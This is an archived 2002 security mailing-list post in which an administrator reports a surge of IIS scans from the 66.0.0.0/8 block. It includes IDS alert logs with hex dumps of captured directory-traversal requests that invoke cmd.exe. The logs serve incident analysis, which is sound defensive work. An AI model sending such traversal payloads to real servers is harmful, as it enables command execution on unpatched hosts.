Increased IIS scans mainly on 66.0.0.0/8

From: Richard Gilman (Richard.Gilmanat_private)
Date: Wed Aug 14 2002 - 09:22:49 PDT

  • Next message: H C: "RE: Subseven Scans"

    Has anyone noticed an increase in scans trying old IIS redirect exploits? It doesn't appear to be RedCode or nimda IMHO, just various attempts to redirect and run cmd.exe?dir. In the last month we have noticed a large increase in this activity 94% of which originates from the 66.0.0.0/8 block (448 sources and only 31 not from 66/8). There are 4 sources originating from fuse.net that are particularly heavy hitters 33,000 hits out of a total of 47,000 hits. I am only seeing it on our 66.0.0.0/8 network so far. Looks like a new worm possibly or 448 kiddie clones? The sources all seem to use the same set of cmd.exe attempts as in the obfuscated logs below.
     
    #(5 - 53409) [2002-07-17 10:40:25]  WEB-IIS cmd.exe access
    IPv4: 66.y.y.35 -> 66.x.x.43
    hlen=5 TOS=0 dlen=136 ID=45497 flags=0 offset=0 TTL=112 chksum=11558
    TCP:  port=1815 -> dport: 80  flags=***AP*** seq=2441649372
    ack=441678925 off=5 res=0 win=16560 urp=0 chksum=12602
    Payload:  length = 94
     
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   2f../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
    030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
    040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
    050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..
    ------------------------------------------------------------------------------
     
    #(5 - 53408) [2002-07-17 10:40:25]  WEB-IIS cmd.exe access
    IPv4: 66.y.y.35 -> 66.x.x.43
    hlen=5 TOS=0 dlen=140 ID=45378 flags=0 offset=0 TTL=112 chksum=11673
    TCP:  port=1626 -> dport: 80  flags=***AP*** seq=2431763146
    ack=975791510 off=5 res=0 win=16560 urp=0 chksum=42327
    Payload:  length = 94
     
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
    030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E   ir c+dir HTTP/1.
    040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F   0..Host: www..Co
    050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F         nnnection: clo
    ------------------------------------------------------------------------------
     
    #(5 - 53407) [2002-07-17 10:40:21]  WEB-IIS cmd.exe access
    IPv4: 66.y.y.35 -> 66.x.x.43
    hlen=5 TOS=0 dlen=136 ID=44586 flags=0 offset=0 TTL=112 chksum=12469
    TCP:  port=1429 -> dport: 80  flags=***AP*** seq=2421845072
    ack=4293161072 off=5 res=0 win=16560 urp=0 chksum=38086
    Payload:  length = 94
     
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
    030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
    040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
    050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..
    ------------------------------------------------------------------------------
     
    #(5 - 53406) [2002-07-17 10:40:19]  WEB-IIS cmd.exe access
    IPv4: 66.y.y.35 -> 66.x.x.43
    hlen=5 TOS=0 dlen=120 ID=44322 flags=0 offset=0 TTL=112 chksum=12749
    TCP:  port=3898 -> dport: 80  flags=***AP**F seq=2161495310
    ack=1433176482 off=5 res=0 win=16560 urp=0 chksum=62138
    Payload:  length = 80
     
    000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73   GET /d/winnt/sys
    010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
    020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   +dir HTTP/1.0..H
    030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
    040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A   ction: close....
    ------------------------------------------------------------------------------
     
    #(5 - 53405) [2002-07-17 10:40:17]  WEB-IIS cmd.exe access
    IPv4: 66.y.y.35 -> 66.x.x.43
    hlen=5 TOS=0 dlen=138 ID=43768 flags=0 offset=0 TTL=112 chksum=13285
    TCP:  port=1395 -> dport: 80  flags=***AP*** seq=2420235203
    ack=934140878 off=5 res=0 win=16560 urp=0 chksum=19568
    Payload:  length = 94
     
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
    030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D   ir dir HTTP/1.0.
    040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E   .Host: www..Conn
    050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65         nection: close
    ------------------------------------------------------------------------------
     
    #(5 - 53404) [2002-07-17 10:40:16]  WEB-IIS cmd.exe access
    IPv4: 66.y.y.35 -> 66.x.x.43
    hlen=5 TOS=0 dlen=137 ID=43638 flags=0 offset=0 TTL=112 chksum=13416
    TCP:  port=1366 -> dport: 80  flags=***AP*** seq=2418722397
    ack=4180274008 off=5 res=0 win=16560 urp=0 chksum=17941
    Payload:  length = 93
     
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   r dir HTTP/1.0..
    040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E   Host: www..Connn
    050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65            ection: close
    ------------------------------------------------------------------------------
     
    #(5 - 53403) [2002-07-17 10:40:16]  WEB-IIS cmd.exe access
    IPv4: 66.y.y.35 -> 66.x.x.43
    hlen=5 TOS=0 dlen=137 ID=43512 flags=0 offset=0 TTL=112 chksum=13542
    TCP:  port=1162 -> dport: 80  flags=***AP*** seq=2408265220
    ack=4037057826 off=5 res=0 win=16560 urp=0 chksum=11122
    Payload:  length = 93
     
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   r dir HTTP/1.0..
    040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E   Host: www..Connn
    050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65            ection: close
     
    Rich
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Wed Aug 14 2002 - 12:47:13 PDT